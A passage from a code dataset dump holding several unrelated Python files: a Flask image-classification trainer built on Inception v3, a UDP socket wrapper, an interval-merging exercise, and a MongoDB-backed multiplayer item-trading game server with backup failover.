'POST'])\r\ndef upload_file():\r\n if request.method == 'POST':\r\n # Check if the Start Training button was clicked\r\n\r\n if 'start_training' in request.form:\r\n os.makedirs(model_dir, exist_ok=True)\r\n # Get the data directory from the form\r\n if 'files' in request.files:\r\n # Get the uploaded folder\r\n uploaded_folder = request.files.getlist(\"files\")\r\n for file in uploaded_folder:\r\n # Check if the selected item is a folder\r\n if file.filename == '':\r\n # Walk through the selected folder and its subfolders\r\n for root, dirs, files in os.walk(file.path):\r\n # Recreate the folder structure on the server\r\n server_folder = os.path.join(upload_dir, root[len(file.path) + 1:])\r\n os.makedirs(server_folder, exist_ok=True)\r\n # Upload the files in the current folder\r\n for file in files:\r\n file_path = os.path.join(root, file)\r\n with open(file_path, 'rb') as f:\r\n file_content = f.read()\r\n # Save the file to the server\r\n with open(os.path.join(server_folder, file), 'wb') as f:\r\n f.write(file_content)\r\n else:\r\n # Get the file's directory and filename\r\n directory, filename = os.path.split(file.filename)\r\n # Construct the absolute path to the file on the server\r\n server_file_path = os.path.join(upload_dir, directory, filename)\r\n # Create the directory structure if it does not exist\r\n os.makedirs(os.path.dirname(server_file_path), exist_ok=True)\r\n # Save the file to the server\r\n file.save(server_file_path)\r\n\r\n # Load the custom dataset\r\n data_dir, _ = os.path.split(directory)\r\n data_dir = os.path.join(upload_dir, data_dir)\r\n\r\n\r\n # Load the custom dataset\r\n (x_train, y_train), (x_test, y_test), num_classes = load_custom_dataset(data_dir)\r\n\r\n # Delete the temporary directory\r\n shutil.rmtree(upload_dir)\r\n\r\n # Load the Inception v3 model and remove the top layer\r\n base_model = tf.keras.applications.InceptionV3(weights='imagenet', include_top=False)\r\n\r\n # Add a new top layer\r\n x = base_model.output\r\n x = tf.keras.layers.GlobalAveragePooling2D()(x)\r\n x = tf.keras.layers.Dense(1024, activation='relu')(x)\r\n predictions = tf.keras.layers.Dense(num_classes, activation='softmax')(x)\r\n\r\n # Create the new model\r\n model = tf.keras.Model(inputs=base_model.input, outputs=predictions)\r\n\r\n # Freeze the base model layers\r\n for layer in base_model.layers:\r\n layer.trainable = False\r\n\r\n # Compile the model with a learning rate of 0.001 and a loss function of categorical crossentropy\r\n model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=0.001), loss='categorical_crossentropy',\r\n metrics=['accuracy'])\r\n\r\n # Normalize the pixel values in the training data to the range [0, 1]\r\n x_train = np.array(x_train)\r\n x_test = np.array(x_test)\r\n y_train = np.array(y_train)\r\n y_test = np.array(y_test)\r\n\r\n # Fit the model to the training data\r\n history = model.fit(x_train, y_train, epochs=10, batch_size=4, validation_data=(x_test, y_test))\r\n\r\n # Save the model\r\n model.save(os.path.join(model_dir, model_name))\r\n flash('Training completed successfully!', 'success')\r\n\r\n if 'predict' in request.form:\r\n if 'files' in request.files:\r\n uploaded_folder = request.files.getlist(\"files\")\r\n predictions = []\r\n count = 0\r\n image_data_uris = []\r\n for file in uploaded_folder:\r\n # Check if the selected item is a folder\r\n if file.filename != '':\r\n # Get the file's directory and filename\r\n count += 1\r\n image_content = file.read()\r\n image = tf.image.decode_image(image_content, 
channels=3)\r\n image = tf.image.resize(image, (299, 299))\r\n image = image / 255.0\r\n image = np.expand_dims(image, axis=0)\r\n directory, filename = os.path.split(file.filename)\r\n if 'Original Inception V3 Model' in request.form.getlist('checkbox'):\r\n # Load the original model\r\n model = tf.keras.applications.InceptionV3(weights='imagenet')\r\n predictionss = model.predict(image)\r\n # Decode the predictions\r\n predicted_classes = tf.keras.applications.inception_v3.decode_predictions(predictionss, top=1)\r\n label_name = str(predicted_classes[0][0][1]).title()\r\n confidence = predicted_classes[0][0][2]\r\n confidence = round(confidence, 2)\r\n predictions.append((count, filename, label_name, confidence))\r\n else:\r\n if not os.path.isdir(model_dir):\r\n alert = 'You need to train model first!! Model file does not exist'\r\n return render_template('upload.html', alert=alert)\r\n elif len(os.listdir(model_dir)) == 0:\r\n alert = 'You need to train model first!! Model file does not exist'\r\n return render_template('upload.html', alert=alert)\r\n # Load the label encoder object from a file\r\n\r\n with open(os.path.join(model_dir, label_encoder_name), 'rb') as f:\r\n label_encoder = pickle.load(f)\r\n # Load the trained model\r\n model = tf.keras.models.load_model(os.path.join(model_dir, model_name))\r\n # Make a prediction\r\n prediction = model.predict(image)\r\n class_index = np.argmax(prediction[0])\r\n confidence = prediction[0][class_index]\r\n confidence = round(confidence, 2)\r\n # Get the label names from the label encoder\r\n label_names = label_encoder.inverse_transform([class_index])\r\n label_name = str(label_names[0]).title()\r\n predictions.append((count, filename, label_names[0], confidence))\r\n # Create a file-like object from the image data\r\n image_file = BytesIO(image_content)\r\n # Load the image using PIL\r\n # Load the image using PIL\r\n image = Image.open(image_file)\r\n image = image.resize(size=(200,200))\r\n # Create a draw object\r\n draw = ImageDraw.Draw(image)\r\n\r\n # Choose a font and font size\r\n font = ImageFont.truetype('arial.ttf', 16)\r\n\r\n # Get the size of the image\r\n width, height = image.size\r\n\r\n # Calculate the position of the text\r\n text_x = 10\r\n text_y = 10\r\n # Draw the text on the image\r\n draw.text((text_x, text_y), label_name, font=font, fill=(255, 255, 255))\r\n\r\n text_width, text_height = draw.textsize(str(confidence), font=font)\r\n # Calculate the position of the text\r\n text_x = width - text_width - 10\r\n text_y = 10\r\n\r\n # Draw the text on the image\r\n draw.text((text_x, text_y), str(confidence), font=font, fill=(255, 255, 255))\r\n\r\n text_width, text_height = draw.textsize(str(filename), font=font)\r\n # Calculate the position of the text\r\n text_x = 10\r\n text_y = height - text_height - 10\r\n\r\n # Draw the text on the image\r\n draw.text((text_x, text_y), str(filename), font=font, fill=(255, 255, 255))\r\n\r\n # Save the image to a buffer\r\n buffer = BytesIO()\r\n image.save(buffer, format='jpeg')\r\n # Encode the image data as a data URI\r\n image_data = buffer.getvalue()\r\n image_data_uri = base64.b64encode(image_data).decode(\"utf-8\")\r\n image_data_uri = f\"data:image/jpeg;base64,{image_data_uri}\"\r\n\r\n # Append the data URI to the list of image data URIs\r\n image_data_uris.append(image_data_uri)\r\n\r\n\r\n return render_template('upload.html', predictions=predictions, image_data_uris=image_data_uris)\r\n\r\n return render_template('upload.html')\r\n\r\nif __name__ == 
'__main__':\r\n app.run(host='0.0.0.0', port=8000, debug=True)\r\n\r\n","repo_name":"rajeshm71/UITrainer","sub_path":"MyApp/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":12401,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"2832593608","text":"import asyncio\nimport socket\nimport struct\n\nfrom anyio import create_udp_socket, create_connected_udp_socket\n\nfrom transport import Transport\n\nclass Udp_socket(Transport):\n \"\"\"Class for work with UDP socket.\n Containe asynchronous function wrapper.\n \"\"\"\n def __init__(self, local_port: int = 2000, \n remote_host: str = 'localhost', \n remote_port: int = 2001):\n \"\"\"\n Args:\n local_port (int, optional): local UDP port. Defaults to 2000.\n remote_host (str, optional): remote UDP host. Defaults to 'localhost'.\n remote_port (int, optional): remote UDP port. Defaults to 2001.\n \"\"\"\n self.local_port = local_port\n self.remote_host = remote_host\n self.remote_port = remote_port\n\n\n async def send_data(self, data: bytes):\n \"\"\"Asynchronous function for sending data to udp socket\n\n Args:\n data (bytes): encoded data for send to udp socket\n \"\"\"\n try:\n async with await create_connected_udp_socket(family = socket.AF_INET, \n remote_host = self.remote_host, \n remote_port = self.remote_port, \n local_host = 'localhost',\n local_port = self.local_port - 1) as udp:\n\n await udp.send(bytes(data))\n except:\n print(\"can't send to host {}:{}\".format(self.remote_host, self.remote_port))\n \n\n async def listen_data(self):\n \"\"\"Asynchronous function for received data from can bus\n\n Returns:\n [bytes]: if received success return encoded data, else return None\n \"\"\"\n try:\n async with await create_udp_socket(family = socket.AF_INET, local_port = self.local_port, local_host = 'localhost') as udp:\n async for packet, _ in udp:\n return packet\n except:\n print(\"can't receive from port: {}\".format(self.local_port))\n await asyncio.sleep(10)\n","repo_name":"emil110778/can_udp_manager","sub_path":"udp_transport.py","file_name":"udp_transport.py","file_ext":"py","file_size_in_byte":2161,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"41582506174","text":"def merge_intervals(intervals):\n print('Input intervals:', intervals)\n\n for i in range(len(intervals) - 1):\n a1, a2 = intervals[i]\n b1, b2 = intervals[i + 1]\n if b1 <= a2 + 1:\n c1 = min(a1, b1)\n c2 = max(a2, b2)\n intervals[i] = None\n intervals[i + 1] = (c1, c2)\n\n output_intervals = list(filter(None, intervals))\n print('Output intervals:', output_intervals)\n print()\n return output_intervals\n\n\nif __name__ == '__main__':\n assert merge_intervals([(1, 4), (2, 6), (8, 10), (12, 19)]) == [(1, 6), (8, 10), (12, 19)], \"First\"\n assert merge_intervals([(1, 12), (2, 3), (4, 7)]) == [(1, 12)], \"Second\"\n assert merge_intervals([(1, 5), (6, 10), (10, 15), (17, 20)]) == [(1, 15), (17, 20)], \"Third\"\n\n\n# # Imported - reduce\n# from functools import reduce\n#\n#\n# def merge_intervals(intervals):\n#\n# def combine(value, element):\n# if value:\n# last_begin, last_end = value[-1]\n# if element[0] <= last_end + 1:\n# value[-1] = (last_begin, max(last_end, element[1]))\n# else:\n# value.append(element)\n# else:\n# value = [element]\n# return value\n#\n# return reduce(combine, intervals, 
[])","repo_name":"ogorodnikov/pycheck","sub_path":"Other/merge_intervals.py","file_name":"merge_intervals.py","file_ext":"py","file_size_in_byte":1272,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"24088494674","text":"import socket\nimport json\nimport time\nimport hashlib\nimport random\nimport calendar\nimport time\nfrom pymongo import MongoClient\nfrom threading import Thread\nfrom threading import Lock\n\ndebug = True\n\ndef recievejson(sock):\n data = ''\n while not is_json(data):\n try:\n chunk = sock.recv(4096).decode('utf-8')\n data += chunk\n except socket.timeout:\n break\n if is_json(data):\n return json.loads(data)\n else:\n return None\n\ndef getipaddress():\n s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n s.connect(('itb.ac.id', 0))\n ip = s.getsockname()[0]\n s.close()\n return ip\n\ndef genhash(username, password):\n h = hashlib.md5()\n h.update((username + \":\").encode('utf-8'))\n h.update(password.encode('utf-8'))\n tyme = time.gmtime()\n h.update(time.strftime(\"%Y-%m-%d %H:%M:%S\",tyme).encode('utf-8'))\n import calendar\n return (h.hexdigest(), calendar.timegm(tyme))\n\ndef genrandomhash():\n hash = random.getrandbits(128)\n return str(hash)\n\ndef mixitem(item1, item2):\n if item1==0 and item2==1 or item1==1 and item2==0:\n return 4\n elif item1==1 and item2==2 or item1==2 and item2==1:\n return 5\n elif item1==2 and item2==3 or item1==3 and item2==2:\n return 6\n elif item1==5 and item2==4 or item1==4 and item2==5:\n return 7\n elif item1==5 and item2==6 or item1==6 and item2==5:\n return 8\n elif item1==7 and item2==8 or item1==8 and item2==7:\n return 9\n else:\n return 10\n\ndef is_json(data):\n try:\n json_object = json.loads(data)\n except ValueError:\n return False\n return True\n\nclass SpfServer:\n def __init__(self,addr,port,backup,db):\n self.upper = []\n self.downer = []\n self.ip = addr\n self.port = port\n self.backup = backup['value']\n self.main_ip = backup['ip']\n self.main_port = backup['port']\n self.backup_ip = ''\n self.backup_port = 0\n self.servers = []\n self.dbname = db\n self.initdb(self.dbname)\n self.initserver()\n self.itemcachelock = Lock()\n self.tracker = socket.socket()\n if not self.backup:\n self.conntracker()\n print('You are the main server')\n else:\n self.connmainserver()\n print('You are the backup server')\n\n\n def __del__(self):\n if hasattr(self, 'dbclient'):\n self.dbclient.close()\n del self.db\n if hasattr(self, 'tracker'):\n self.tracker.close()\n if hasattr(self, 'server'):\n self.server.close()\n\n def initdb(self,dbname):\n self.dbclient = MongoClient()\n self.db = self.dbclient[dbname]\n print('Database Connected')\n\n def conntracker(self):\n self.tracker.connect(('167.205.32.46',8000))\n print('Tracker Connected')\n\n def connmainserver(self):\n self.tracker.connect((self.main_ip,self.main_port))\n print('Main Server Connected')\n\n def initserver(self): # listening socket\n self.server = socket.socket()\n self.server.bind(('',self.port))\n print(self.ip+','+str(self.port))\n print('Server ready to listen')\n\n def gettracker(self): # hanya dipanggil pada awal koneksi ke tracker\n message = '{\"method\":\"join\", \"ip\":\"'+self.ip+'\",\"port\":'+str(self.port)+'}'\n self.tracker.send(bytes(message,'utf-8'))\n data = ''\n while not is_json(data):\n chunk = self.tracker.recv(4096).decode('utf-8')\n data += chunk\n if debug:\n print(data)\n if data != \"\":\n decoded = json.loads(data)\n status = decoded['status']\n if status == \"ok\":\n 
self.servers = decoded['value']\n return 0\n else:\n self.servers = None\n self.error = decoded['description']\n return 1\n\n def getcacheitem(self,item):\n self.itemcachelock.acquire()\n\n refresh = False\n # cari informasi cache offer\n infocache = self.db.offercache.find_one({'item_number':item})\n jsonofferlist = None\n if (infocache == None):\n refresh = True\n else:\n # kalau cache kosong atau cache expired (lebih dari 3000 detik)\n if (calendar.timegm(time.gmtime()) - infocache['time']) > 3000 :\n refresh = True\n self.db.offercache.remove({'item_number':item})\n self.db.offercache.remove({'offered_item':item})\n else:\n jsonofferlist = self.db.offercache.find({'offered_item':item})\n\n if refresh:\n servers = self.servers\n srvthread = []\n jsonofferlist = []\n for server in servers:\n if server['ip'] == self.ip and server['port'] == self.port:\n continue\n thr = SpfSendFindThread(server['ip'],server['port'],item)\n thr.daemon = True\n thr.start()\n srvthread.append(thr)\n for thr in srvthread:\n thr.join()\n for thr in srvthread:\n if thr.data == None:\n continue\n status = thr.data['status']\n if status == \"ok\":\n for recvoffer in thr.data['offers']:\n if debug:\n print(recvoffer)\n try:\n if int(recvoffer[0]) == item:\n jsonofferlist.append({'token':recvoffer[5], 'offered_item':int(recvoffer[0]), \\\n 'n1':int(recvoffer[1]), 'demanded_item':int(recvoffer[2]), \\\n 'n2':int(recvoffer[3]), 'availability':recvoffer[4], \\\n 'ip':thr.server, 'port':thr.port})\n except ValueError:\n continue\n for offer in jsonofferlist:\n self.db.offercache.insert(offer)\n self.db.offercache.insert({'item_number':item, 'time':calendar.timegm(time.gmtime())})\n # return hasil cache dan unlock\n self.itemcachelock.release()\n return jsonofferlist\n\n def searchcachetoken(self,token):\n self.itemcachelock.acquire()\n result = self.db.offercache.find_one({'token':token})\n self.itemcachelock.release()\n return result\n\n def removecachetoken(self,token):\n self.itemcachelock.acquire()\n result = self.db.offercache.remove({'token':token})\n self.itemcachelock.release()\n\n def start(self):\n print('Starting')\n status = self.gettracker()\n print('Get tracker')\n print('Servers: ',self.servers)\n if status == 1:\n print('Error', self.error)\n exit()\n self.tracker.close()\n self.trkthread = SpfTrackerThread(self)\n self.trkthread.daemon = True\n self.trkthread.start()\n self.msvthread = SpfMainServerThread(self)\n self.msvthread.daemon = True\n self.msvthread.start()\n self.bckthread = SpfBackupThread(self)\n self.bckthread.daemon = True\n self.bckthread.start()\n self.server.listen(1)\n while True:\n try:\n print('Cari client')\n conn, addr = self.server.accept()\n print('Dapet client')\n SpfListenerThread(self, conn).start()\n except SystemExit:\n print('keyboard interupt!')\n break\n\nclass SpfMainServerThread(Thread):\n def __init__(self,srv):\n Thread.__init__(self)\n self.srv = srv\n\n def run(self):\n while True:\n try:\n time.sleep(3)\n if self.srv.backup_ip != '' and self.srv.backup_port != 0:\n sock = socket.socket()\n sock.settimeout(10)\n try:\n sock.connect((self.srv.backup_ip,self.srv.backup_port))\n data = {'method':'serverStatus','server':self.srv.servers}\n data['server'].index({'ip':self.srv.ip,'port':self.srv.port})\n jstring = json.dumps(data)\n if debug:\n print(\"Send server status\",jstring)\n sock.send(bytes(jstring,'utf-8'))\n response = recievejson(sock)\n if response == None:\n response = json.loads('{\"status\":\"fail\",\"description\":\"JSON Parsing error\"}')\n if debug:\n 
print(\"Receive server status: \",response)\n finally:\n sock.close()\n except SystemExit:\n break\n\nclass SpfBackupThread(Thread):\n def __init__(self,srv):\n Thread.__init__(self)\n self.srv = srv\n\n def run(self):\n while True:\n try:\n time.sleep(3)\n if self.srv.backup:\n sock = socket.socket()\n sock.settimeout(10)\n try:\n sock.connect((self.srv.main_ip,self.srv.main_port))\n servers = self.srv.downer + [{'ip':self.srv.ip,'port':self.srv.port}]\n data = {'method':'backup','server':servers}\n jstring = json.dumps(data)\n if debug:\n print(\"Send backup: \",jstring)\n sock.send(bytes(jstring,'utf-8'))\n response = recievejson(sock)\n if response == None:\n response = json.loads('{\"status\":\"fail\",\"description\":\"JSON Parsing error\"}')\n if debug:\n print(\"Receive backup: \",response)\n if response['status']=='ok':\n self.srv.upper = response['server']\n except (socket.timeout,ConnectionRefusedError): #Takeover the main server\n self.srv.upper.pop()\n self.srv.tracker = socket.socket()\n if self.srv.upper == []:\n self.srv.backup = False\n print('You are now the main server')\n self.srv.conntracker()\n else:\n self.srv.main_ip = self.srv.upper[-1]['ip']\n self.srv.main_port = self.srv.upper[-1]['port']\n self.srv.connmainserver()\n self.srv.gettracker()\n finally:\n sock.close()\n except SystemExit:\n break\n\nclass SpfTrackerThread(Thread):\n def __init__(self,srv):\n Thread.__init__(self)\n self.srv = srv\n\n def run(self):\n while True:\n try:\n time.sleep(10)\n print('Servers: ',self.srv.servers)\n print('('+self.srv.ip+','+str(self.srv.port)+')')\n except SystemExit:\n break\n\nclass SpfListenerThread(Thread):\n def __init__(self,srv, sock):\n Thread.__init__(self)\n self.daemon = True\n self.srv = srv\n self.sock = sock\n\n def process(self, message):\n if message['method']== 'signup':\n if 'username' in message and 'password' in message:\n if self.srv.db.user.find_one({'username':message['username']}) == None:\n self.srv.db.user.insert({'username':message['username'],'password':message['password'], 'inventory':[0, 0, 0, 0, 0, 0, 0, 0, 0, 0], 'field':True, 'x':0, 'y':0})\n return json.dumps({'status':'ok'})\n else:\n return json.dumps({'status':'fail', 'description':'Username exists'})\n return json.dumps({'status':'error'})\n elif message['method']== 'serverStatus':\n if 'server' in message:\n self.srv.servers = message['server']\n return json.dumps({'status':'ok','servers':self.srv.servers})\n return json.dumps({'status':'error'})\n elif message['method']== 'login':\n if 'username' in message and 'password' in message:\n user = self.srv.db.user.find_one({'username':message['username'], 'password':message['password']})\n if user != None:\n token = genhash(user['username'], user['password'])\n if self.srv.db.active_user.find_one({'username':message['username']}) == None:\n self.srv.db.active_user.insert({'username':message['username'],'token':token[0]})\n else:\n self.srv.db.active_user.update_one({'username':message['username']},{'$set':{'token':token[0]}})\n return json.dumps({'status':'ok', 'token':token[0], 'x':user['x'], 'y':user['y'], 'time':token[1]})\n else:\n return json.dumps({'status':'fail', 'description':'Invalid username/password'})\n return json.dumps({'status':'error'})\n elif message['method']=='inventory':\n if 'token' in message:\n active_user = self.srv.db.active_user.find_one({'token':message['token']})\n if active_user != None:\n inventory = self.srv.db.user.find_one({'username':active_user['username']}, {'inventory':1,'_id':0 })['inventory']\n 
return json.dumps({'status':'ok', 'inventory':inventory})\n            return json.dumps({'status':'error'})\n        elif message['method']=='mixitem':\n            if 'token' in message and 'item1' in message and 'item2' in message:\n                active_user = self.srv.db.active_user.find_one({'token':message['token']})\n                if active_user != None:\n                    inventory = self.srv.db.user.find_one({'username':active_user['username']}, {'inventory':1,'_id':0 })['inventory']\n                    mix = mixitem(message['item1'], message['item2'])\n                    if mix < 10 and inventory[message['item1']] > 0 and inventory[message['item2']] > 0:\n                        inventory[message['item1']] -= 1\n                        inventory[message['item2']] -= 1\n                        inventory[mix] += 1\n                        self.srv.db.user.update_one({'username':active_user['username']},{'$set':{'inventory':inventory}})\n                        return json.dumps({'status':'ok', 'inventory':inventory})\n                    elif mix == 10:\n                        return json.dumps({'status':'fail', 'description':'Wrong mixture'})\n                    elif inventory[message['item1']] == 0 or inventory[message['item2']] == 0:\n                        return json.dumps({'status':'fail', 'description':'Not enough item'})\n            return json.dumps({'status':'error'})\n        elif message['method']=='map':\n            if 'token' in message:\n                active_user = self.srv.db.active_user.find_one({'token':message['token']})\n                if active_user != None:\n                    map = self.srv.db.map.find_one()\n                    return json.dumps({'status':'ok', 'name':map['name'], 'width':int(map['width']), 'height':int(map['height'])})\n            return json.dumps({'status':'error'})\n        elif message['method']=='move':\n            if 'token' in message and 'x' in message and 'y' in message:\n                active_user = self.srv.db.active_user.find_one({'token':message['token']})\n                if active_user != None:\n                    user = self.srv.db.user.find_one({'username':active_user['username']})\n                    map = self.srv.db.map.find_one()\n                    if (int(message['x']) != user['x'] or int(message['y']) != user['y']) and int(message['x']) >= 0 and int(message['y']) >= 0\\\n                        and message['x'] <= map['width'] and message['y'] <= map['height']:\n                        self.srv.db.user.update_one({'username':active_user['username']},{'$set':{'x':message['x'], 'y':message['y'], 'field':True}})\n                        return json.dumps({'status':'ok', 'time':calendar.timegm(time.gmtime())+10})\n                    elif message['x'] == user['x'] and message['y'] == user['y']:\n                        return json.dumps({'status':'fail', 'description':'Yer character is not moving'})\n                    else:\n                        return json.dumps({'status':'fail', 'description':'Out of bounds'})\n            return json.dumps({'status':'error'})\n        elif message['method']=='field':\n            if 'token' in message:\n                active_user = self.srv.db.active_user.find_one({'token':message['token']})\n                if active_user != None:\n                    user = self.srv.db.user.find_one({'username':active_user['username']})\n                    user_field = user['field']\n                    inventory = user['inventory']\n                    item = int(self.srv.db.map.find_one()['map'][user['x']][user['y']])\n                    if user_field:\n                        inventory[item] += 1\n                        self.srv.db.user.update_one({'username':active_user['username']}, {'$set':{'field':False, 'inventory':inventory}})\n                        return json.dumps({'status':'ok', 'item':int(item)})\n                    else:\n                        return json.dumps({'status':'fail', 'description':'Item already taken in ('+str(user['x'])+','+str(user['y'])+')'})\n            return json.dumps({'status':'error'})\n        elif message['method']=='offer':\n            if 'token' in message and 'offered_item' in message and 'n1' in message and 'demanded_item' in message and 'n2' in message:\n                active_user = self.srv.db.active_user.find_one({'token':message['token']})\n                if active_user != None:\n                    offered_item = int(message['offered_item'])\n                    inventory = 
self.srv.db.user.find_one({'username':active_user['username']})['inventory']\n                    if int(message['n1']) <= inventory[offered_item]:\n                        inventory[offered_item] -= int(message['n1'])\n                        self.srv.db.tradebox.insert({'token':genrandomhash(), 'offered_item':message['offered_item'], \\\n                        'n1':message['n1'], 'demanded_item':message['demanded_item'], 'n2':message['n2'], 'availability':'true', \\\n                        'username':active_user['username']})\n                        self.srv.db.user.update_one({'username':active_user['username']}, {'$set':{'inventory':inventory}})\n                        return json.dumps({'status':'ok'})\n                    else:\n                        return json.dumps({'status':'fail', 'description':'Insufficient offer'})\n            return json.dumps({'status':'error'})\n        elif message['method']=='tradebox':\n            if 'token' in message:\n                active_user = self.srv.db.active_user.find_one({'token':message['token']})\n                if active_user != None:\n                    offers = []\n                    offer_list = self.srv.db.tradebox.find({'username':active_user['username']})\n                    for offer in offer_list:\n                        offers.append([int(offer['offered_item']), int(offer['n1']), int(offer['demanded_item']), int(offer['n2']), offer['availability'], offer['token']])\n                    return json.dumps({'status':'ok', 'offers':offers})\n            return json.dumps({'status':'error'})\n        elif message['method']=='sendfind':\n            if 'token' in message and 'item' in message:\n                active_user = self.srv.db.active_user.find_one({'token':message['token']})\n                if active_user != None:\n                    offers = []\n                    offer_list = self.srv.db.tradebox.find({'offered_item':message['item'], 'username':{'$ne':active_user['username']}, 'availability':'true'})\n                    for offer in offer_list:\n                        offers.append([int(offer['offered_item']), int(offer['n1']), int(offer['demanded_item']), int(offer['n2']), offer['availability'], offer['token']])\n\n                    cachejsonlist = self.srv.getcacheitem(int(message['item']))\n                    for offer in cachejsonlist:\n                        offers.append([int(offer['offered_item']), int(offer['n1']), int(offer['demanded_item']), int(offer['n2']), offer['availability'], offer['token']])\n\n                    return json.dumps({'status':'ok', 'offers':offers})\n            return json.dumps({'status':'error'})\n        elif message['method']=='findoffer':\n            if 'item' in message:\n                offers = []\n                offer_list = self.srv.db.tradebox.find({'offered_item':message['item']})\n                for offer in offer_list:\n                    offers.append([offer['offered_item'], offer['n1'], offer['demanded_item'], offer['n2'], offer['availability'], offer['token']])\n                return json.dumps({'status':'ok', 'offers':offers})\n            return json.dumps({'status':'error'})\n        elif message['method']=='sendaccept':\n            if 'token' in message and 'offer_token' in message:\n                active_user = self.srv.db.active_user.find_one({'token':message['token']})\n                if active_user != None:\n                    inventory = self.srv.db.user.find_one({'username':active_user['username']})['inventory']\n                    offer = self.srv.db.tradebox.find_one({'token':message['offer_token']})\n\n                    # maybe in trade box\n                    if offer != None:\n                        if int(offer['n2']) > inventory[offer['demanded_item']]:\n                            return json.dumps({'status':'fail', 'description':'Insufficient demand'})\n                        # update tradebox\n                        self.srv.db.tradebox.update_one({'token':message['offer_token']},\\\n                            {'$set':{'availability':'false'}})\n                        # update inventory\n                        inventory[offer['demanded_item']] -= int(offer['n2'])\n                        inventory[offer['offered_item']] += int(offer['n1'])\n                        self.srv.db.user.update_one({'username':active_user['username']}, {'$set':{'inventory':inventory}})\n                        return json.dumps({'status':'ok'})\n                    # maybe in item cache\n                    offer = self.srv.searchcachetoken(message['offer_token'])\n                    if offer != None:\n                        if int(offer['n2']) > inventory[offer['demanded_item']]:\n                            return 
json.dumps({'status':'fail', 'description':'Insufficient demand'})\n\n                        # send accept offer to corresponding server\n                        sock = socket.socket()\n                        sock.settimeout(10)\n                        sock.connect((offer['ip'], offer['port']))\n                        jstring = '{\"method\":\"accept\", \"offer_token\":\"'+message['offer_token']+'\"}'\n                        sock.send(bytes(jstring,'utf-8'))\n                        data = ''\n                        while not is_json(data):\n                            try:\n                                chunk = sock.recv(4096).decode('utf-8')\n                                data += chunk\n                            except socket.timeout:\n                                break\n                        sock.close()\n                        if debug:\n                            print(data)\n                        if is_json(data):\n                            #delete offer from cache\n                            self.srv.removecachetoken(message['offer_token'])\n                            decoded = json.loads(data)\n                            status = decoded['status']\n                            if status == \"ok\":\n                                # update inventory\n                                inventory[offer['demanded_item']] -= int(offer['n2'])\n                                inventory[offer['offered_item']] += int(offer['n1'])\n                                self.srv.db.user.update_one({'username':active_user['username']}, {'$set':{'inventory':inventory}})\n                                return json.dumps({'status':'ok'})\n                            else:\n                                return json.dumps({'status':'fail', 'description':'Offer unavailable in corresponding server'})\n                        else:\n                            return json.dumps({'status':'fail', 'description':'Server corresponding to offer failed to respond'})\n                    # nowhere found!\n                    return json.dumps({'status':'fail', 'description':'Offer not found'})\n                else:\n                    return json.dumps({'status':'fail', 'description':'User not exist'})\n            return json.dumps({'status':'error'})\n        elif message['method']=='accept':\n            if 'offer_token' in message:\n                offer = self.srv.db.tradebox.find_one({'token':message['offer_token']})\n                if offer != None:\n                    if offer['availability']=='true':\n                        self.srv.db.tradebox.update_one({'token':message['offer_token']},\\\n                            {'$set':{'availability':'false'}})\n                        return json.dumps({'status':'ok'})\n                    else:\n                        return json.dumps({'status':'fail', 'description':'Offer not available'})\n                else:\n                    return json.dumps({'status':'fail', 'description':'Offer not exist'})\n            return json.dumps({'status':'error'})\n        elif message['method']=='fetchitem':\n            if 'token' in message and 'offer_token' in message:\n                active_user = self.srv.db.active_user.find_one({'token':message['token']})\n                if active_user != None:\n                    inventory = self.srv.db.user.find_one({'username':active_user['username']})['inventory']\n                    offer = self.srv.db.tradebox.find_one({'token':message['offer_token']})\n                    if offer != None:\n                        if offer['availability'] != 'true':\n                            self.srv.db.tradebox.update_one({'token':message['offer_token']},\\\n                                {'$set':{'availability':'false'}})\n                            inventory[int(offer['demanded_item'])] += int(offer['n2'])\n                            self.srv.db.user.update_one({'username':active_user['username']}, {'$set':{'inventory':inventory}})\n                            self.srv.db.tradebox.delete_one({'token':message['offer_token']})\n                            return json.dumps({'status':'ok'})\n                        else:\n                            return json.dumps({'status':'fail', 'description':'Offer still available'})\n                    else:\n                        return json.dumps({'status':'fail', 'description':'Offer not exist'})\n                else:\n                    return json.dumps({'status':'fail', 'description':'User not exist'})\n            return json.dumps({'status':'error'})\n        elif message['method']=='canceloffer':\n            if 'token' in message and 'offer_token' in message:\n                active_user = self.srv.db.active_user.find_one({'token':message['token']})\n                if active_user != None:\n                    inventory = self.srv.db.user.find_one({'username':active_user['username']})['inventory']\n                    offer = self.srv.db.tradebox.find_one({'token':message['offer_token']})\n                    if offer != None:\n                        if offer['availability'] == 'true':\n                            self.srv.db.tradebox.delete_one({'token':message['offer_token']})\n                            inventory[int(offer['offered_item'])] += int(offer['n1'])\n                            
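# persist the refunded items so the cancelled offer's escrow returns to the user's inventory\n                            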
self.srv.db.user.update_one({'username':active_user['username']}, {'$set':{'inventory':inventory}})\n return json.dumps({'status':'ok'})\n else:\n return json.dumps({'status':'fail', 'description':'Offer already finished'})\n else:\n return json.dumps({'status':'fail', 'description':'Offer not exist'})\n else:\n return json.dumps({'status':'fail', 'description':'User not exist'})\n return json.dumps({'status':'error'})\n elif message['method']=='join':\n if 'ip' in message and 'port' in message:\n return json.dumps({'status':'ok','value':self.srv.servers})\n return json.dumps({'status':'error'})\n elif message['method']=='backup':\n if 'server' in message:\n try:\n if self.srv.backup_ip == '' or (self.srv.backup_ip == message['server'][-1]['ip'] and\\\n self.srv.backup_port == message['server'][-1]['port']):\n self.srv.downer = message['server']\n upper = self.srv.upper + [{'ip':self.srv.ip,'port':self.srv.port}]\n return json.dumps({'status':'ok','server':upper})\n else:\n return json.dumps({'status':'fail','description':'Backup server still running'})\n except ValueError:\n self.srv.backup_ip = ''\n self.srv.backup_port = 0\n return json.dumps({'status':'fail','description':'Invalid ip/port'})\n return json.dumps({'status':'error'})\n else:\n return '{\"status\":\"error\"}'\n\n def run(self):\n try:\n print('Server to client thread running')\n print(self.sock)\n self.sock.settimeout(60)\n data = ''\n while not is_json(data):\n chunk = self.sock.recv(4096).decode('utf-8')\n data += chunk\n try:\n message = json.loads(data)\n if debug:\n print(message)\n except ValueError:\n response = '{\"status\":\"error\"}'\n if 'method' in message:\n response = self.process(message)\n else:\n response = 